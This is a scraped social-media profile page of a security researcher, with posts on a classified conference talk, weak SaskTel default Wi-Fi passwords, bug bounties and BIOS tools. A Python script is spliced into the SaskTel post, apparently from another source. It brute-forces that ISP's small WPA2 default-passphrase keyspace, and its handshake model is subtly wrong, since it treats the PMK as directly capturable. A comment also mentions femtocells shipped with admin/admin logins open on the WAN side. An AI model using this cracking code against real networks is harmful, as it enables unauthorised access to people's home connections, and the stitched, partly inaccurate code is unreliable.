Dragos Ruiu
Works at dragostech.com inc.
Attended University of Alberta
Lived in Saskatchewan
957,241 views

Stream

Dragos Ruiu

Shared publicly  - 
Are your servers vulnerable?

Dragos Ruiu

Shared publicly  - 
Sigh. The French Dept. of Interior (their DHS equivalent) and the U.S. DoD have decided that Eric Filiol's material about network attacks on infrastructure is too dangerous, so they have classified it, disallowing its presentation, and, to punctuate their desires with an exclamation point, are rattling sabers about prosecution and lawsuits against conference organizers and presenters. To which I'd like to remind everyone concerned: "Security by Obscurity is not much Security at all."

Hiding vulnerability information hinders solutions and mitigation more than it hinders attackers.

Oh well, fortunately we were turning back some pretty awesome talks in the runners-up this year, so now we will be able to use that slot for something else I regretted having to turn away....

Still. Sigh.

(P.s. I notice my overuse of the word "awesome" these days. Wish I could get that "Everything is Awesome" LEGO soundbite out of my head... freaking infectious soundmemes.)
They obviously do not want the solution. What could be the reason...? :-) 

Dragos Ruiu

Shared publicly  - 
Turns out governments installing fixed plate readers aren't as big a security/privacy issue as unregulated private repo companies are; more reasons to hate tow-truck-driving vampire leeches on society. http://goo.gl/4XOK0S
+Stephen Baird you do realize we have that without the gargoyle suits...?

Dragos Ruiu

Shared publicly  - 
Sometimes, weak passwords are worse than default passwords. Here in Saskatchewan, the dominant monopoly telco, SaskTel, installs wifi routers with seemingly difficult-to-guess passwords, so most customers just leave them in the default configuration. A quick cruise of any residential street will find large numbers of default routers with their stock install SSID (and presumably their default passwords). The problem is that the default password/SSID scheme contains very little entropy/randomness while appearing to most users to be difficult to guess: the only part of the WPA2 key you have to guess is the exchange prefix (three numeric digits) of a telephone number. If the passwords were something immediately obvious as guessable, I'd wager more users would change them; but as it stands, getting an anonymous wifi connection in Saskatchewan is pretty simple.
That's almost as bad as not even telling your users your internet-connected product has a user-accessible web interface (which is, by default, open on the internet side as well as the internal interface).

As a great example, take the Sprint Airave (a US cell phone company's femtocell). In order to function properly, it MUST be the first device behind your point of presence, so its WAN port must truly face the WAN. The instructions included with the unit, and apparently the story told by the techs who come to install it, are that it autoconfigures itself and if it needs to be worked on you must call the cellphone company.

...the default login is admin/admin, the techs who install them don't change that, and the configuration panel is open on the WAN port. When the unit at my parents' house was having issues, and I discovered just how insecure it was, I was not happy.
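The keyspace the SaskTel post above describes, worked through as an added example (this is not code from the original post, nor anything SaskTel ships). It assumes, as the post implies, that the WPA2 passphrase is a 10-digit telephone number whose area code and 4-digit line number are already known to the attacker (the page does not give the real SSID layout; the SSID, area code 306 and line number used here are constructed), so only the 3-digit exchange prefix has to be guessed. WPA2-PSK derives its pairwise master key as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes), which is what a captured 4-way handshake lets an attacker check candidates against offline; the "captured" PMK below is simply derived inline from a chosen passphrase.

```python
import hashlib
import hmac
import math
from typing import List, Optional

# WPA2-PSK (IEEE 802.11i) fixes the passphrase-to-PMK derivation:
# PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)
WPA2_PBKDF2_ROUNDS = 4096


def derive_pmk(passphrase: str, ssid: str, rounds: int = WPA2_PBKDF2_ROUNDS) -> bytes:
    """Pairwise Master Key for a WPA2-PSK network. A sniffed 4-way handshake
    lets an attacker verify a candidate PMK offline, so this is the cost of
    one guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), rounds, 32)


def candidate_keys(area_code: str, line_number: str) -> List[str]:
    """Every 10-digit number sharing the known area code and 4-digit line
    number, varying only the 3-digit exchange prefix (000..999). Real NANP
    exchanges start with 2-9, so the live keyspace is smaller still."""
    return [f"{area_code}{n:03d}{line_number}" for n in range(1000)]


def keyspace_bits(n_candidates: int) -> float:
    """Effective entropy of a secret drawn uniformly from n_candidates values."""
    return math.log2(n_candidates)


def recover_passphrase(ssid: str, target_pmk: bytes, area_code: str, line_number: str,
                       rounds: int = WPA2_PBKDF2_ROUNDS) -> Optional[str]:
    """Offline dictionary attack: derive the PMK for each candidate and compare
    it (constant-time) with the PMK recovered from the captured handshake."""
    for cand in candidate_keys(area_code, line_number):
        if hmac.compare_digest(derive_pmk(cand, ssid, rounds), target_pmk):
            return cand
    return None


if __name__ == "__main__":
    # Constructed scenario, not a real network: Saskatchewan's 306 area code,
    # an arbitrary line number 5678 and an arbitrary exchange prefix 342.
    ssid = "HomeRouter-constructed"          # assumption: SSID layout is not on the page
    real_passphrase = "3063425678"
    captured_pmk = derive_pmk(real_passphrase, ssid)   # stands in for a sniffed handshake

    print(f"candidates to try: {len(candidate_keys('306', '5678'))}"
          f" (~{keyspace_bits(1000):.1f} bits of entropy)")
    print(f"random 8-char alphanumeric key for comparison: ~{keyspace_bits(62 ** 8):.1f} bits")
    print("recovered passphrase:", recover_passphrase(ssid, captured_pmk, "306", "5678"))
```

Exhausting all 1000 candidates takes a few seconds of single-core Python even at the full 4096 PBKDF2 rounds, versus roughly 2^48 guesses for an 8-character random alphanumeric key; that 10-bit-versus-48-bit gap is the whole point of the post, and a 10-digit phone number looks no less intimidating to a user than a random string does.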

Dragos Ruiu

Shared publicly  - 
Damn, the folks in the security community are pretty awesome. Johnny Long, who is in Africa working on a much more worthy computer hack, writes:

"I am humbled and speechless. @bannedit0 donated his IBB bounty to @ihackcharities: http://scarybeastsecurity.blogspot.in/2014/02/internet-bug-bounty-issues-its-first.html?m=1

Wow! 

I'm scratching my head, really because this is one of "those" days where I'm overwhelmed and feeling like I just want to get the flip out of here. Nothing seems to be going well or right and then this comes in and I'm nudged on by the fact that this isn't about how tired or strung out I am. It's not about how I feel. It's about something bigger that people like David D Rude II (bannedit) believe in enough to sacrifice for. 

And just like that, I'm back in the fight."

Dragos Ruiu

Shared publicly  - 
UPnP + fuzzer = ufuzz. Now get back to patching those SSL servers.

Dragos Ruiu

Shared publicly  - 
At their presentation for CanSecWest 2014, Xeno Kovah and John Butterworth from MITRE announced the general availability of their new (improved) Copernicus 2 BIOS dumping utility, which includes a lot of anti-subversion/attack technologies (tl;dr: they use Intel Trusted Execution (TXT) storage to store dumped BIOS checksums for verification, plus a number of other verification checks to hinder shenanigans).
http://goo.gl/Qwj1Wu

Your move, attackers...

Dragos Ruiu

Shared publicly  - 
Mo' money, mo' problems.

Dragos Ruiu

Shared publicly  - 
Also awesome: I've derided both ETH Zurich and U of Pittsburgh drone flashiness for their reliance on external cameras and offboard processing; however, this awesome work has been ported to a real flying device too. http://goo.gl/MqHCGc
Nice

Dragos Ruiu

Shared publicly  - 
Looks awesome - so now Samsung and LG will copy it.
Story
Tagline
Stop, Think, Pwn.
Introduction
Systems Rationalizer
Bragging rights
Can hover inverted. ;-)
Education
  • University of Alberta
Basic Information
Gender
Male
Other names
dr
Work
Occupation
engineer
Employment
  • dragostech.com inc.
    engineer, 1997 - present
  • HP
  • Myrias
Places
Previously
Saskatchewan
Dragos Ruiu's +1's are the things they like, agree with, or want to recommend.
Threema
market.android.com

Threema is a messaging app with a particular focus on security. True end-to-end encryption guarantees that nobody

CPU-Z
market.android.com

Android version of the popular CPU identification tool for PC/Windows., CPU-Z is a free application that reports information about your devi

Demand answers and real consequences for robocall election fraud
www.leadnow.ca

Elections Canada just traced misleading phone calls made during the 2011 federal election to a company that worked for the Conservative Part

KB14320-How to maximize battery life and free memory on the BlackBerry s...
btsc.webapps.blackberry.com

Maximizing Battery Power. Application Management. Multitasking - Close any running BlackBerry® smartphone applications that are not being ac

Play VOB,MKV,MTS,FLV RM,RMVB on Windows RT (Surface 8 RT included) » AMV...
blog.amvsoft.com

Overview Microsoft has made an important step to support the playback of MPEG-4 on Windows 8 RT and Windows 8 Pro. Windows RT has excellent s

Locus Pro
market.android.com

MULTI-FUNCTION TOURIST NAVIGATION Irreplaceable application for hiking, geocaching and your everyday life. Locus offers many useful features

A free and open world depends on a free and open web. | Google
www.google.com

A free and open world depends on a free and open Internet. Governments alone, working behind closed doors, should not direct its future. The

There's a New Way to Own a Piece of Facebook Before Its IPO
mashable.com

If you're looking to invest in Facebook before its IPO but not privy to the secondary markets where shares of the company have been trad

Maverick
market.android.com

Off-road GPS navigator with offline maps support, compass and track recording. Use offline maps and GPS even without an internet connection.

Vancouver Riot: Psychology (Not Hooligans) Is Responsible for the Chaos...
bleacherreport.com

As I sat at home watching the Vancouver riots unfold in front of me, I was amazed at how ill-informed the newscasters and on-site reporters